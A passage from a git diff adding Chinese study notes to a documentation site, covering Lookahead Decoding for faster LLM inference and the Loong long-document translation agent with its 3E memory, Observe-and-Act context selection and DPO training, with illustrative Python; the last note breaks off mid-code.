+|---|---|---| +| 生成方式 | 一个一个来 | 一批一批来 | +| 并行性 | 低 | 高 | +| 准确性 | 100% | 原始 Jacobi 不保证 | + +**Jacobi 解码** 的思路:用上一轮生成的所有 token 同时预测下一轮的所有 token。但它有一个致命问题——输出的概率分布和原模型不一致。 + +**Lookahead Decoding** 的创新:在 Jacobi 的基础上加了 **验证机制**,既保留了并行加速,又保证输出和原模型完全一致。 + +### 3.2 两个核心组件 + +Lookahead Decoding 有两个分支: + +**1. 前瞻分支(Lookahead Branch)** — "猜字的人" + +- 维护一个固定的 2D 窗口:时间轴(过去几步)+ 序列轴(未来几个位置) +- 参数 W = 前瞻窗口大小(一次猜多少个 token) +- 参数 N = 回看步数(利用过去几步的历史信息) +- 从这个窗口中提取多个 **n-gram**(连续 token 序列) +- 这些 n-gram 是 **互不重叠的**,可以并行验证 + +**2. 验证分支(Verification Branch)** — "检查答案的人" + +- 从 n-gram 池中找出以当前最后一个 token 开头的候选 n-gram +- 用目标模型一次性验证所有这些 n-gram +- 验证通过的 n-gram 直接加入输出序列 +- 验证不通过的,只保留匹配的部分,剩余的继续自回归生成 + +### 3.3 关键参数速查 + +| 参数 | 含义 | 典型值 | +|---|---|---| +| W | 前瞻窗口(lookahead window) | 5 | +| N | 回看步数(lookback steps) | 4 | +| G | 每个步骤的 n-gram 候选数 | = W | +| n | 每个 n-gram 的长度 | N | +| S | 压缩比(compression ratio) | 1.5 - 4.0 | + +## 4 代码示例 + +### 示例 1:n-gram 提取过程 + +假设我们有以下历史生成记录(不同颜色代表不同时间步生成): + +``` +时间步 t-3: [猫, 喜欢, 晒太阳] +时间步 t-2: [喜欢, 晒太阳, 很] +时间步 t-1: [晒太阳, 很, 舒服] +时间步 t: [?] +``` + +设 N = 4(回看 3 步 + 当前步),W = 5(前瞻 5 个位置)。 + +```python +def extract_ngrams(history_window, current_step, n=4): + """ + 从 2D 窗口中提取互不重叠的 n-gram + + history_window: 二维列表,每一行代表一个时间步生成的 tokens + current_step: 当前时间步的输入 tokens + n: n-gram 的长度 + + 返回: 一组互不重叠的 n-gram 候选 + """ + ngrams = [] + + # 从历史轨迹中提取 n-gram + # 例如:用 t-3 的第 2 个 token + t-2 的第 3 个 token + # + t-1 的第 4 个 token + t 的新预测 token + # 组成一个长度为 4 的 n-gram + + for i in range(len(history_window) - (n - 1)): + ngram = [] + for j in range(n): + row = i + j # 沿着时间轴滑动 + col = j # 沿着序列轴偏移 + if row < len(history_window): + if col < len(history_window[row]): + ngram.append(history_window[row][col]) + else: + # 当前步的 token 还未生成 + pass + if len(ngram) >= 2: # 至少需要 2 个已知的 token + ngrams.append(ngram) + + return ngrams + +# 模拟数据 +history = [ + ["猫", "喜欢", "晒太阳"], # t-3 + ["喜欢", "晒太阳", "很"], # t-2 + ["晒太阳", "很", "舒服"], # t-1 +] + +ngrams = extract_ngrams(history, current_step=[], n=4) +# 提取出的 n-gram 候选(部分): +# ["猫", "喜欢", "晒太阳", ???] +# ["喜欢", "晒太阳", "很", ???] +# ["晒太阳", "很", "舒服", ???] +``` + +### 示例 2:完整解码循环(简化版) + +```python +def lookahead_decode(model, prompt, W=5, N=4, max_steps=100): + """ + Lookahead Decoding 的简化实现 + + model: 目标 LLM + prompt: 输入提示词 + W: 前瞻窗口大小 + N: 回看步数 + """ + output = list(prompt) # 逐步积累的输出序列 + window = [] # 2D 窗口:[时间步][序列位置] + ngram_pool = [] # n-gram 池 + + for step in range(max_steps): + # ---- 第 1 步:前瞻分支(并行预测)---- + # 用当前窗口 + 历史轨迹,并行预测 W 个未来位置的 token + new_tokens = model.parallel_predict(window, output[-N:]) + + # 将新 token 加入窗口 + window.append(new_tokens) + + # 从窗口中提取 n-gram 候选 + candidate_ngrams = extract_ngrams(window, new_tokens, n=N) + ngram_pool.extend(candidate_ngrams) + + # 限制窗口大小:移除最旧的 token + if len(window) > N: + window.pop(0) + + # ---- 第 2 步:验证分支(并行验证)---- + # 从池中找出以当前最后一个 token 开头的 n-gram + last_token = output[-1] + valid_candidates = [ + ng for ng in ngram_pool + if ng and ng[0] == last_token + ] + + if valid_candidates: + # 一次性并行验证所有候选 n-gram + accepted = model.verify_ngrams(valid_candidates, output) + + # 将验证通过的 n-gram 加入输出 + if accepted: + output.extend(accepted) + # 从池中移除已使用的 n-gram + ngram_pool = [ng for ng in ngram_pool if ng not in accepted] + continue + + # 如果没有可接受的 n-gram,退回一步式自回归生成 + next_token = model.generate(output) + output.append(next_token) + + return output +``` + +### 示例 3:验证过程的数学直觉 + +```python +def verify_single_ngram(ngram, model, output): + """ + 验证单个 n-gram 是否正确 + + 原理:类比 speculative decoding 的验证方法 + 把整个 n-gram 送给模型,一次性得到每个 token 的概率分布, + 然后检查模型输出的最大值是否等于我们"猜"的那个 token。 + + 例如 n-gram = ["很", "舒服", "的"] + 输入: [..., last_token, 很, 舒服, 的] + 模型输出: p(token|context) 对于 "很"、"舒服"、"的" 各一个分布 + + 如果每个分布的最大值 token 等于我们猜的 token → 接受 + 否则,找到第一个不匹配的位置,拒绝后续的 token + """ + # 构造完整的输入序列 + input_seq = output + ngram + + # 模型一次性输出每个位置的概率分布 + logprobs = model.forward_logprobs(input_seq) + + # 渐进式验证(progressive verification) + accepted_len = 0 + for i in range(len(ngram)): + predicted_token = logprobs[i + len(output)].argmax() # 最可能的 token + expected_token = ngram[i] + + if predicted_token == expected_token: + accepted_len += 1 + else: + # 第一个不匹配,停止验证 + break + + # 返回验证通过的 token 数 + return accepted_len + + +# 举例: +# output = ["猫", "喜欢"] +# ngram = ["晒太阳", "很", "舒服"] +# +# 模型验证后返回 accepted_len = 2 +# 意味着前 2 个猜对了,第 3 个不对 +# 输出变为: ["猫", "喜欢", "晒太阳", "很"] +# 第 3 个 token 需要模型重新生成 +``` + +## 5 加速原理:为什么能提速 + +Lookahead Decoding 的核心思想是 **用每步更多的 FLOPs 换取更少的解码步数**。 + +``` +传统自回归: 生成 100 个 token = 100 步 = 100 次模型前向传播 +Lookahead: 生成 100 个 token = 约 30 步 = 30 次模型前向传播 + 但每步的输入是 5 个 token 而不是 1 个 + 每步计算量增加了 ~5 倍 + 总计算量:30 x 5 = 150 步的计算量 +``` + +**关键点**:虽然总计算量多了 1.5 倍,但瓶颈不是计算(FLOPs),而是显存带宽。GPU 每次读取模型权重到显存的开销是固定的,无论你一次处理 1 个 token 还是 5 个 token。所以: + +- 100 次前向传播:100 次读取模型权重的开销 +- 30 次前向传播:30 次读取模型权重的开销 → 省了 70% 的带宽开销 +- **最终加速比 ≈ 1.5x - 4x**(取决于任务和模型大小) + +论文实验数据: +- MT-Bench 对话任务:最高 1.8x 加速 +- 代码补全任务:最高 4x 加速(代码中重复 token 多,n-gram 更容易匹配) +- 配合 FlashAttention:额外 20% 加速 +- 多 GPU 强扩展:4x 加速 + +## 6 与 Speculative Decoding 的对比 + +| | Speculative Decoding | Lookahead Decoding | +|---|---|---| +| 需要草稿模型 | 是(需要训练一个小模型) | 否 | +| 草稿来源 | 草稿模型的输出 | 历史轨迹中的 n-gram | +| 并行性 | 有限(一条草稿链) | 高(多个互不重叠的 n-gram) | +| 通用性 | 受草稿模型限制 | 通用,无需额外模型 | +| 验证方式 | 逐个验证草稿 token | 批量验证多个 n-gram | + +## 7 关键洞察:缩放定律 + +论文第 4 节提出了一个重要的缩放定律: + +> **解码步数可以随着每步 log(FLOPs) 线性减少** + +换句话说:如果你把每步的处理量(batch size W)从 1 增加到 10,解码步数大约会减少 log(10) ≈ 2.3 倍,而不是 10 倍。这是因为 n-gram 的接受率会随长度增加而下降,但 **你不需要担心遇到瓶颈上限**——这与 speculative decoding 不同,后者在草稿模型质量有限时会遇到加速天花板。 + +## 8 总结 + +Lookahead Decoding 的核心贡献只有三句话: + +1. 利用 Jacobi 迭代的思想,用历史生成的轨迹提取多个互不重叠的 n-gram,并行预测未来的 token +2. 用一个验证分支一次性验证所有候选 n-gram,保证输出分布与原模型完全一致 +3. 不需要任何额外的草稿模型或数据存储器,是一个即插即用的加速方法 + +它本质上做了一个权衡:**用更多的每步计算量换取更少的总步数**,恰好击中了 LLM 推理的瓶颈——显存带宽,而不是计算能力。 + +## 9 延伸阅读 + +- 论文代码:https://github.com/hao-ai-lab/LookaheadDecoding +- 相关方法:Speculative Decoding(LEAD 论文)、Jacobi Decoding(2023) +- FlashAttention:加速注意力计算的重要基础设施 diff --git a/src/content/docs/papers/loong-doc-mt.md b/src/content/docs/papers/loong-doc-mt.md new file mode 100644 index 000000000..611dcf7b3 --- /dev/null +++ b/src/content/docs/papers/loong-doc-mt.md @@ -0,0 +1,374 @@ +--- +title: Loong — 类人长文档翻译 Agent 与自适应上下文选择 +来源: https://arxiv.org/abs/2605.30274 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:专业译员翻长篇小说 + +想象你接到一本**五十万字的技术手册**或**古典小说**的翻译任务。你不会把整本书一次性塞进脑子里再动笔——那既记不住,也会被无关细节淹没。专业译员通常这样做: + +1. **分段推进**:每次翻译一小段(比如 5 句),翻完再写下一段。 +2. **三层笔记本**: + - **剧情摘要本**(Essence):每翻完一段,用几句话记下「这段讲了什么、文体如何」; + - **例句对照本**(Exemplar):把已翻好的中英(或德/法)句对存起来,遇到类似句式时参考; + - **术语卡**(Entity):「Korren → 科伦(中尉,不是上校)」「Borlatin Xiao → 博拉丁·肖上尉」——专名一旦定稿就不能漂移。 +3. **翻下一段前先「看再选」**(Observe-and-Act):从笔记本里**检索**候选条目,但**不会全塞进 prompt**——译员会判断:这段摘要跟当前句有关吗?那个例句的文体值得模仿吗?这条术语卡是否重复了? +4. **噪声会害人**:如果把所有历史摘要、所有例句、所有实体一股脑丢给模型,上下文窗口很快爆掉;更糟的是,无关信息会**干扰**当前句的翻译(论文称「冗余上下文降低质量」)。 + +**Loong**(龙)就是把这个「类人译员工作流」做成 LLM Agent:**3E 记忆模块**存历史、**Observe-and-Act 推理**筛上下文、**强化学习(DPO)**优化「该看什么、怎么用」,再配合**对齐强制翻译算法**保证源句与译句一一对应。 + +一句话:**长文档翻译的难点不是「有没有上下文」,而是「选什么上下文、怎么用」——Loong 学的是这个策略。** + +--- + +## 是什么 + +**Loong: A Human-Like Long Document Translation Agent with Observe-and-Act Adaptive Context Selection**(Wang 等,哈工大深圳 / 澳门大学 / 华为翻译中心,arXiv:[2605.30274](https://arxiv.org/abs/2605.30274))提出: + +1. **3E 记忆模块**:Essence(段摘要)+ Exemplar(双语句对)+ Entity(实体术语库),多粒度存储已翻译历史。 +2. **Observe-and-Act 自适应上下文选择**:三步推理——先选摘要、再选例句、再选实体——每步输出「思考 + 选中子集」,过滤冗余。 +3. **基于采样轨迹的偏好学习**:对每步动作并行采样 \(M\) 次、对翻译采样 \(N\) 次,用 COMET 等质量分构造 \((\text{preferred}, \text{dispreferred})\) 对,经 **SFT + DPO(LoRA)** 优化策略。 +4. **对齐强制推理**:递归二分切分未对齐的段,保证**句级对齐**,便于评测与记忆更新。 + +| 项目 | 内容 | +|------|------| +| 任务 | 文档级机器翻译(DocMT) | +| 语言对 | 英 ↔ 中、德、法(训练);评测含跨域、未见语言、超长《西游记》 | +| 骨干模型 | Qwen2.5-7B、Qwen3-8B/14B、Llama3.1-8B 等 | +| 开源 | [github.com/YutongWang1216/LoongDocMT](https://github.com/YutongWang1216/LoongDocMT) | +| 效果 | 三项指标平均最高约 **+13.0** 分;Llama3.1-8B 上 LLM-as-Judge 比 DelTA 高 **7.1** 分 | + +--- + +## 为什么重要 + +长文档翻译是 LLM 的「夹心困境」: + +| 困境 | 表现 | +|------|------| +| **窗口有限** | 整篇历史塞进 prompt → 超长文档直接失败(Doc2Doc 在《西游记》约 156–160 行处崩溃) | +| **冗余有害** | 有记忆但不筛选 → sCOMET 甚至不如逐句翻译(DelTA/Doc2Doc 在 Qwen3-8B 上低于 Sentence 基线) | +| **一致性难** | 专名漂移(Korren → Cole/Kolen/Korm)、职衔错误(中尉译成上校) | +| **对齐难** | Doc2Doc 生成句数与源句不对齐 → 文档级指标与记忆更新都不可靠 | + +Loong 把问题从「堆更多 token」转成「**学一个上下文策略**」,对 Agent、RAG、长上下文应用都有参考价值。 + +--- + +## 核心概念 + +### 1. 文档分段与 Doc2Doc 工作流 + +源文档切成 \(L\) 个段 \(\{s_1,\ldots,s_L\}\),每段默认 **5 句**。按序翻译:翻完 \(s_\tau\) 后更新 3E 记忆,再处理 \(s_{\tau+1}\)。属于 **Doc2Doc**(整段输出),但通过句级对齐算法兼顾 **Doc2Sent** 的评测友好性。 + +### 2. 3E 记忆模块(Human-like Translation Memory) + +| 组件 | 粒度 | 存什么 | 怎么检索 | +|------|------|--------|----------| +| **Essence** | 全局/语义 | 已完成段的 LLM 摘要 | 句向量余弦相似度,取 top-\(K_s\)(默认 4) | +| **Exemplar** | 模式/文体 | 全部历史源-译句对 | 同样 embedding 检索 top-\(K_x\)(默认 4) | +| **Entity** | 专名/术语 | \((e^{src}, e^{tgt}, \text{属性})\) 结构化记录 | 当前段出现的实体 + 上下文相关描述 | + +实体分 Character、Organization、Location、Event、Object、Other 六类,每类有不同属性字段(见论文附录 A.1)。翻译完一段后,Agent **抽取实体并更新知识库**。 + +### 3. Observe-and-Act 三步推理 + +候选上下文排成序列 \(\mathbf{E} = \langle \tilde{\mathcal{E}}_s, \tilde{\mathcal{E}}_x, \tilde{\mathcal{E}}_n \rangle\)。Agent 执行三步 \(\langle O_1,A_1,O_2,A_2,O_3,A_3 \rangle\): + +- **Observe \(O_k\)**:当前步的候选集合 + 之前步的历史推理; +- **Act \(A_k\)**:\(\langle r_k, \mathcal{C}_k \rangle\)——先写**推理链** \(r_k\) 分析相关性,再输出**选中子集** \(\mathcal{C}_k\)。 + +**为何分三步而不是一次选?** 联合搜索空间是 \(O(\prod 2^K)\),逐步分解为 \(O(\sum 2^K)\),且能对每种上下文类型做**细粒度消融**(论文 Table 3:去掉 Essence 伤害最大)。 + +### 4. 偏好数据构造(训练时) + +对每个 \(A_k\) **并行采样 \(M=7\) 次** → 每种选择再**采样 \(N=5\) 个翻译** → 用 \(\mu\)(sCOMET)算效用 \(U(A_k^i)\): + +- **上下文选择数据集 \(\mathcal{D}_{sel}\)**:同一步里效用最高/最低的动作为 preferred/dispreferred; +- **上下文利用数据集 \(\mathcal{D}_{util}\)**:同一选中上下文下,最好/最差翻译为 preferred/dispreferred。 + +最后 \(\mathcal{D} = \mathcal{D}_{sel} \cup \mathcal{D}_{util}\)。 + +### 5. SFT + DPO 两阶段微调 + +1. **SFT**:只用 preferred 样本,教会模型「能推理、能输出结构化结果」; +2. **DPO**(\(\beta=0.1\),LoRA rank=8):在完整偏好对上优化,相对 SFT checkpoint 拉大 preferred 与 dispreferred 的对数几率差。 + +论文称此为 RL 优化;实现上是 **offline preference optimization(DPO)**,而非在线 PPO。 + +### 6. 对齐强制翻译(Alignment-Enforced Inference) + +推理时每类上下文**只采样一次**选择,不做中间质量评估。生成时对段 \(u_{i:j}\) 注入句序号与分隔符;若输出句数与源句不对齐,**递归二分**切半重译,直到对齐或降到单句: + +\[ +T(u_{i:j}) = \begin{cases} +\text{LLM}(u_{i:j}), & \text{已对齐或 } i=j \\ +T(u_{i:k}) \oplus T(u_{k+1:j}), & \text{否则} +\end{cases} +\] + +### 7. 基线对比(你在读论文时会看到) + +| 基线 | 做法 | 弱点 | +|------|------|------| +| **Sentence** | 逐句翻译,无文档上下文 | 术语/文体不一致 | +| **Segment** | 分段翻译,不用跨段记忆 | 无长程依赖 | +| **Doc2Doc** | 对话历史堆全部已译段 | 窗口爆炸 + 噪声 | +| **DelTA** | 多粒度记忆 + 检索,**不过滤** | 冗余上下文干扰句级质量 | + +Loong ≈ DelTA 的记忆架构 + **Observe-and-Act 筛选** + **DPO 学策略**。 + +--- + +## 代码示例 1:极简 3E 记忆与检索(教学用) + +下面用 Python 伪代码演示 Essence / Exemplar 的「翻译一段 → 写记忆 → 下一段检索」循环。实体库用 dict 简化;embedding 用占位函数表示。 + +```python +from dataclasses import dataclass, field +from typing import List, Tuple, Dict +import numpy as np + +def embed(text: str) -> np.ndarray: + """实际论文用 all-distilroberta-v1;这里用随机向量占位。""" + rng = np.random.default_rng(abs(hash(text)) % (2**32)) + v = rng.standard_normal(768) + return v / (np.linalg.norm(v) + 1e-9) + +def top_k_by_cosine(query: str, items: List[str], k: int) -> List[str]: + q = embed(query) + scored = [(it, float(np.dot(q, embed(it)))) for it in items] + scored.sort(key=lambda x: x[1], reverse=True) + return [it for it, _ in scored[:k]] + +@dataclass +class ThreeEMemory: + essences: List[str] = field(default_factory=list) # 段摘要 + exemplars: List[Tuple[str, str]] = field(default_factory=list) # (src, tgt) 句对 + entities: Dict[str, str] = field(default_factory=dict) # src_term -> tgt_term + + def update_after_segment(self, src_sents: List[str], tgt_sents: List[str], summary: str): + self.essences.append(summary) + for s, t in zip(src_sents, tgt_sents): + self.exemplars.append((s, t)) + # 实体抽取省略:实际 Loong 用 LLM 结构化抽取六类实体 + +def retrieve_candidates(memory: ThreeEMemory, segment_src: str, k_s: int = 4, k_x: int = 4): + essence_cands = top_k_by_cosine(segment_src, memory.essences, k_s) + src_pool = [s for s, _ in memory.exemplars] + idx = top_k_by_cosine(segment_src, src_pool, k_x) + exemplar_cands = [(s, t) for s, t in memory.exemplars if s in idx] + entity_cands = {k: v for k, v in memory.entities.items() if k in segment_src} + return essence_cands, exemplar_cands, entity_cands + +# --- 模拟翻译两段的 Doc2Doc 循环 --- +memory = ThreeEMemory() + +segments = [ + "Captain Borlatin Xiao led the squad. Korren was his lieutenant.", + "The armored unit moved toward Nemic. Borlatin Xiao gave the order.", +] + +for seg in segments: + ess, ex, ent = retrieve_candidates(memory, seg) + # Loong 在此调用 Observe-and-Act LLM,从 ess/ex/ent 中再「思考+筛选」 + prompt_context = {"essence": ess, "exemplar": ex, "entity": ent} + tgt_seg = f"[TRANSLATED] {seg}" # 占位:真实系统走对齐强制 LLM 调用 + memory.update_after_segment( + src_sents=seg.split(". "), + tgt_sents=[tgt_seg], + summary=f"Summary of: {seg[:40]}...", + ) + print("segment:", seg[:50], "...") + print(" retrieved essences:", len(ess), "exemplars:", len(ex)) +``` + +要点:**检索只是候选池**;Loong 的价值在下一步 Agent **拒绝无关条目**(论文案例:10 个实体候选 prune 到 2 个,并丢弃与 record 5 重复的 record 10)。 + +--- + +## 代码示例 2:Observe-and-Act 偏好对构造(对应 §3.2) + +训练数据来自「同一观察 \(O_k\) 下,不同动作 \(A_k\) 导致不同翻译质量」。下面演示效用 \(U(A)\) 与 preferred/dispreferred 的选取逻辑(公式 3–4)。 + +```python +import random +from statistics import mean + +def comet_score(src: str, hyp: str, ref: str) -> float: + """占位:论文用 wmt22-comet-da 作为 μ。""" + # 真实实现调用 Unbabel/COMET + overlap = len(set(hyp.split()) & set(ref.split())) / max(len(ref.split()), 1) + return 80.0 + 10.0 * overlap + random.uniform(-0.5, 0.5) + +def sample_translations(src: str, context_subset, n: int = 5) -> list[str]: + """给定选中上下文,采样 n 个翻译(论文 N=5)。""" + return [f"hyp_{i}_with_{len(context_subset)}_ctx" for i in range(n)] + +def build_selection_preference(observation: dict, actions: list[dict], src: str, ref: str): + """对同一步 k,从 M 个动作中选 U 最高/最低,构成 D_sel 样本。""" + utilities = [] + for act in actions: + hyps = sample_translations(src, act["selected"]) + u = mean(comet_score(src, h, ref) for h in hyps) + utilities.append((act, u)) + best = max(utilities, key=lambda x: x[1]) + worst = min(utilities, key=lambda x: x[1]) + return { + "observation": observation, + "preferred": best[0], + "dispreferred": worst[0], + "u_plus": best[1], + "u_minus": worst[1], + } + +# 模拟 Step 1:从 4 条 Essence 摘要中选子集(M=7 种动作,这里只演示 3 种) +src_segment = "Korren reported to Captain Borlatin Xiao." +ref_segment = "科伦向博拉丁·肖上尉作了汇报。" + +candidate_summaries = [ + "Squad leadership and ranks in chapter 1", + "Weather report from previous chapter", # 噪声 + "Armored unit deployment near Nemic", + "Character name spellings: Korren, Borlatin Xiao", +] + +actions = [ + {"thought": "Summary 1,4 mention ranks and names.", "selected": [0, 3]}, + {"thought": "Use all summaries.", "selected": [0, 1, 2, 3]}, # 含噪声 → 通常更差 + {"thought": "Only summary 2.", "selected": [1]}, +] + +pref = build_selection_preference( + observation={"step": 1, "candidates": candidate_summaries}, + actions=actions, + src=src_segment, + ref=ref_segment, +) + +print("preferred utility:", pref["u_plus"]) +print("dispreferred utility:", pref["u_minus"]) +print("preferred selection indices:", pref["preferred"]["selected"]) +``` + +构造出的三元组 \((O_k, A_k^+, A_k^-)\) 与 \((\langle s_\tau, \mathcal{C}_k \rangle, t^+, t^-)\) 一起送入 **SFT → DPO**。推理时不再采样 \(M\times N\) 次,每步**一次** Observe-and-Act 即可。 + +--- + +## 实验结果速览 + +### 主结果(Table 2) + +在 News Commentary V18.1 与 WMT24++ 上,Loong 在 **sCOMET / dCOMET / LLM-as-Judge** 三项平均上 consistently SOTA。例如 Qwen3-8B、Xx⇒En、WMT24++:**LLM 分 83.5**,DelTA 为 81.1。 + +### 消融(Table 3,Llama3.1-8B En⇒Xx) + +| 设置 | Avg | 解读 | +|------|-----|------| +| Loong 完整 | 80.2 | — | +| w/o Context(只学翻译) | 77.4 | 证明「学策略」比「多看译文」重要 | +| w/o Translation(只学选择) | 63.6 | 选择与利用必须联合训练 | +| w/o Tuning | 75.4 | 微调必要 | +| w/o Essence | 79.0 | 全局摘要最关键 | +| w/o Exemplar | 79.3 | 文体例句重要 | +| w/o Entity | 79.7 | 术语一致性 | + +### 超长文档(《西游记》→ 葡萄牙语,Figure 1) + +Doc2Doc 在中途因上下文长度**翻译失败**;DelTA 等指标随长度**持续下滑**;Loong 凭结构化记忆 + selective retrieval **全程稳定**,累积 sCOMET / LLM 分最高。 + +--- + +## 与相关工作的关系 + +```text +Doc2Sent(邻句编码) → 目标侧上下文利用不足 +Doc2Doc(历史堆 prompt) → 窗口与噪声 +DelTA(3E 记忆 + 检索) → Loong 的直接前驱,缺「过滤」 +Think-and-Translate RL → 句级推理翻译;Loong 扩展到 DocMT + 多步 Observe-and-Act +DeepSeek-R1 / o1 范式 → Loong 把「采样轨迹 + 偏好优化」用到上下文策略 +``` + +--- + +## 适用 vs 不适用 + +**适用**: + +- 技术手册、新闻、小说等**长文档**机翻 +- 需要**术语一致、文体统一、跨段指代**的场景 +- 已有开源 LLM、希望用 **Agent + 记忆 + DPO** 提升 DocMT 而非换更大窗口 +- 研究 **自适应 RAG / 上下文压缩** 的 NLP 或 Agent 系统 + +**局限**(论文 Limitation): + +- 分段长度固定为 5 句,未对齐自然 discourse 边界 +- Observe-and-Act 多步推理 → **推理成本**高于 one-pass +- 奖励模型 COMET 与人工文档级偏好可能有 gap +- 实体抽取与六类属性维护增加 pipeline 复杂度 + +--- + +## 超参数备忘(复现实验) + +| 参数 | 值 | +|------|-----| +| 段长 \(l\) | 5 句 | +| \(K_s, K_x\) | 4(超长文 Essence/Exemplar 可调至 8/6) | +| 动作采样 \(M\) | 7 | +| 翻译采样 \(N\) | 5 | +| SFT | 1 epoch, lr 1e-5, batch 64, ZeRO-3 | +| DPO | 1 epoch, lr 5e-6, batch 32, \(\beta=0.1\), LoRA r=8 | +| max length | 2560 | +| 推理 temperature | 0.7, top-p 1.0 | + +--- + +## 踩过的坑(读论文时的常见误解) + +1. **Loong ≠ 更大 context window**:核心是**外部记忆 + 选择性注入**,不是把 128K 全塞满。 +2. **3E 检索 ≠ 最终上下文**:检索 top-K 只是候选;Observe-and-Act 还会**再删**。 +3. **RL 在这里主要是 DPO**:不是环境交互式 PPO;偏好来自**自己采样**的轨迹。 +4. **对齐算法不能省**:DocMT 评测依赖句对齐;不对齐则 dCOMET 与记忆更新都会失真。 +5. **Sentence 基线有时很强**:说明「加上下文」若带噪声,不如不加——Loong 的价值在**滤噪**。 + +--- + +## 自测题 + +1. 3E 三个组件分别解决什么粒度的问题? +2. 为什么 Observe-and-Act 要分三步而不是一次选出所有上下文? +3. \(\mathcal{D}_{sel}\) 和 \(\mathcal{D}_{util}\) 分别优化 Agent 的哪种能力? +4. DelTA 与 Loong 架构上最大差异是什么? +5. 对齐强制算法在什么情况下递归二分? + +
+参考答案(先自己做) + +1. Essence 管全局语义/体裁;Exemplar 管句式与文体模式;Entity 管专名与术语一致性。 +2. 联合选择空间指数级;分步将复杂度从 \(O(\prod 2^K)\) 降到 \(O(\sum 2^K)\),且便于分析各记忆类型的贡献。 +3. \(\mathcal{D}_{sel}\):**选什么**上下文;\(\mathcal{D}_{util}\):**给定上下文怎么译**。 +4. DelTA 检索后**不过滤**;Loong 增加 Observe-and-Act 推理 + DPO 学习筛选策略。 +5. 当 LLM 输出段落的句数/分隔与源段不一致,且段内多于 1 句时,切半分别调用 \(T(\cdot)\) 直到对齐或单句。 + +
+ +--- + +## 延伸阅读 + +- 论文 HTML:[arxiv.org/html/2605.30274v1](https://arxiv.org/html/2605.30274v1) +- 代码:[github.com/YutongWang1216/LoongDocMT](https://github.com/YutongWang1216/LoongDocMT) +- 前驱 DelTA(多粒度记忆 DocMT Agent):Wang et al., 2025c +- 指标:sCOMET / dCOMET(Unbabel COMET、amazon-science/doc-mt-metrics) +- 同类思路:GraphRAG、长文 Agent 记忆、DPO 偏好优化 + +--- + +## 一句话总结 + +**Loong 像带三本笔记本的资深译员:翻长文档时先检索、再思考、只把真正相关的摘要/例句/术语塞进当前 prompt,并用 DPO 把这套「观察—行动」策略练成肌肉记忆——在有限窗口下换得术语稳、文体齐、超长文不崩。** diff --git a/src/content/docs/papers/loong-long-document-translation-agent-with-observe-and-act-arxiv-2605-30274.md b/src/content/docs/papers/loong-long-document-translation-agent-with-observe-and-act-arxiv-2605-30274.md new file mode 100644 index 000000000..25bbb8078 --- /dev/null +++ b/src/content/docs/papers/loong-long-document-translation-agent-with-observe-and-act-arxiv-2605-30274.md @@ -0,0 +1,240 @@ +--- +title: Loong: 类人长文档翻译 Agent — Observe-and-Act 自适应上下文选择 +来源: https://arxiv.org/abs/2605-30274 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# Loong: 类人长文档翻译 Agent 学习笔记 + +## 一句话概括 + +Loong 是一个能像人一样翻译长文档的 AI Agent——它不是把整篇文档一股脑塞给模型,而是通过"观察—行动"(Observe-and-Act)的方式,主动回忆之前看过的信息,智能选择最有用的上下文来指导翻译。 + +## 从日常类比开始 + +想象你在翻译一本 300 页的小说。 + +**没有 Loong 的做法**:你把 300 页一次性交给翻译人员,但人的注意力有限——翻到第 280 页时,你早就忘了第 15 页里女主角的名字叫"艾琳"。 + +**Loong 的做法**:你每次只翻译 1-2 页,但手边有三个笔记本: + +1. **精华本 (Essence)** — 之前每段的简要总结,类似目录提要 +2. **例句本 (Exemplar)** — 之前遇到过的相似句对,帮你参考翻译风格 +3. **人名地名本 (Entity)** — 记录所有专有名词的统一译名 + +当你翻译第 200 页时,不会翻遍所有笔记,而是先"观察"当前句子需要什么信息,再"行动"去对应的本子里找最相关的几页。这就是 **Observe-and-Act**。 + +## 核心问题:长文档翻译难在哪? + +大语言模型翻译短文本效果很好,但长文档有两个致命问题: + +1. **上下文窗口有限**:再大的模型也有"天花板",300 页塞不进去 +2. **信息冗余**:就算勉强塞进去,模型也会淹没在大量无关信息中,反而翻译得更差 + +传统的分块翻译 (Chunk-based Translation) 虽然解决了窗口限制,但各段之间容易脱节——同一个人被翻译成不同名字,前后语气不一致。 + +## Loong 的解决方案:3E 记忆模块 + +Loong 的核心创新在于 **3E Memory**,三个记忆维度各有分工: + +| 维度 | 全称 | 作用 | 类比 | +|------|------|------|------| +| **E**ssence | 精华记忆 | 之前段落的摘要总结 | 读书时的读书笔记 | +| **E**xemplar | 例句记忆 | 历史上相似句子对的记录 | 翻译时的参考例句 | +| **E**ntity | 实体记忆 | 人名、地名、术语的统一翻译 | 术语表和译名对照表 | + +这不是简单地"把所有历史信息堆在一起"。Loong 的关键在于:**它不会被动地让模型 attends 到所有历史,而是主动推理"现在到底需要什么"**。 + +## Observe-and-Act:核心机制 + +这是 Loong 最精华的部分。整个过程可以分成两个阶段: + +### 阶段一:Observe(观察) + +面对当前待翻译的句子,Agent 先问自己几个问题: + +- 这个句子提到了哪些实体?人名?地名?专业术语? +- 之前的段落大概讲了什么?(查 Essence) +- 有没有之前翻译过的相似句子可以参考?(查 Exemplar) +- 这些实体之前是怎么翻译的?(查 Entity) + +### 阶段二:Act(行动) + +基于观察的结果,Agent 从三个记忆维度中**动态选择**最相关的信息,组装成一个精简的上下文,然后翻译。 + +这个过程不是一次性的。翻译完一句后,新的信息会被写入 3E 记忆,供后面使用。整个流程可以反复循环: + +``` +观察当前句 → 查询 3E 记忆 → 选择最相关的上下文 → 翻译 → 写入新信息 → 回到观察 +``` + +### 用代码理解这个过程 + +下面的伪代码展示了 Loong Agent 的核心循环: + +```python +class LoongAgent: + def __init__(self): + # 3E 记忆存储 + self.essence_memory = [] # 段落摘要列表 + self.exemplar_memory = [] # 相似句对列表 + self.entity_memory = {} # 实体 → 翻译对照表 + + def observe(self, source_sentence, index): + """ + 观察阶段:分析当前句子需要什么信息 + """ + # 提取句中的实体 + entities = extract_entities(source_sentence) + + # 查询三个记忆维度 + relevant_essence = search(self.essence_memory, top_k=2) + relevant_exemplar = search(self.exemplar_memory, source_sentence, top_k=3) + relevant_entity = {e: self.entity_memory.get(e, None) for e in entities} + + return { + "entities": entities, + "essence": relevant_essence, + "exemplar": relevant_exemplar, + "entity": relevant_entity, + } + + def act(self, observation, source_sentence, llm): + """ + 行动阶段:基于观察构建上下文并翻译 + """ + context = build_context(observation) + + # 构建 prompt,只包含最相关的信息 + 